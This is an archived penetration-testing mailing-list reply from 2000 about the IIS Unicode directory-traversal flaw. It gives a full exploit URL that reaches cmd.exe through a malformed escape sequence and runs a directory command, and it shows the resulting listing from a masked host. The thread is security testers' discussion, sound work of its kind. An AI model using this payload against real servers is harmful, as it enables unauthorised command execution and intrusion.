Penetration Testing mailing list archives

Re: [PEN-TEST] IIS UNICODE Strings

From: Mike Ahern <mc_ahern () YAHOO COM>
Date: Tue, 31 Oct 2000 15:13:31 -0800

Vitaly Osipov [vos () TELENOR CZ] wrote:
Hmm... I see some *very* strange strings in you
examples below... the second excaped symbol (%pc for
example) is not real escaped hex-code -if it works,
then the problem is not in Unicode at all, but in
something else
---------------------------


Trust Me, It Works!!! Which is interesting since at
least one system reported as patched appears to be
still vulnerable. I had assumed the admin either
didn't patch, or used the wrong hotfix. Perhaps that
is not the case...

The Proof is in the Pudding:
----------------------------

http://10.X.X.X/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
 Directory of c:\

06/23/00  01:38p                     0 AUTOEXEC.BAT
06/23/00  01:38p                     0 CONFIG.SYS
06/23/00  01:40p        <DIR>          Dell
06/26/00  03:29p        <DIR>          INetPub
06/26/00  02:10p        <DIR>          MSSQL7
06/26/00  01:40p        <DIR>          Multimedia
Files
06/26/00  03:14p        <DIR>          My
Installations
06/27/00  01:05p        <DIR>          Program Files
06/30/00  09:00a        <DIR>          TEMP
07/10/00  11:42a        <DIR>          WINNT


 -mch



__________________________________________________
Do You Yahoo!?

From homework help to love advice, Yahoo! Experts has your answer.

http://experts.yahoo.com/

Current thread:

Re: [PEN-TEST] IIS UNICODE Strings Marco (Nov 01)
- <Possible follow-ups>
- Re: [PEN-TEST] IIS UNICODE Strings Vitaly Osipov (Nov 01)
- Re: [PEN-TEST] IIS UNICODE Strings Mike Ahern (Nov 01)
- Re: [PEN-TEST] IIS UNICODE Strings Unicraft Systems (Nov 01)
- Re: [PEN-TEST] IIS UNICODE Strings Moonen, Ralph (Nov 02)
- Re: [PEN-TEST] IIS UNICODE Strings Mike Ahern (Nov 02)
- Re: [PEN-TEST] IIS UNICODE Strings Mike Ahern (Nov 02)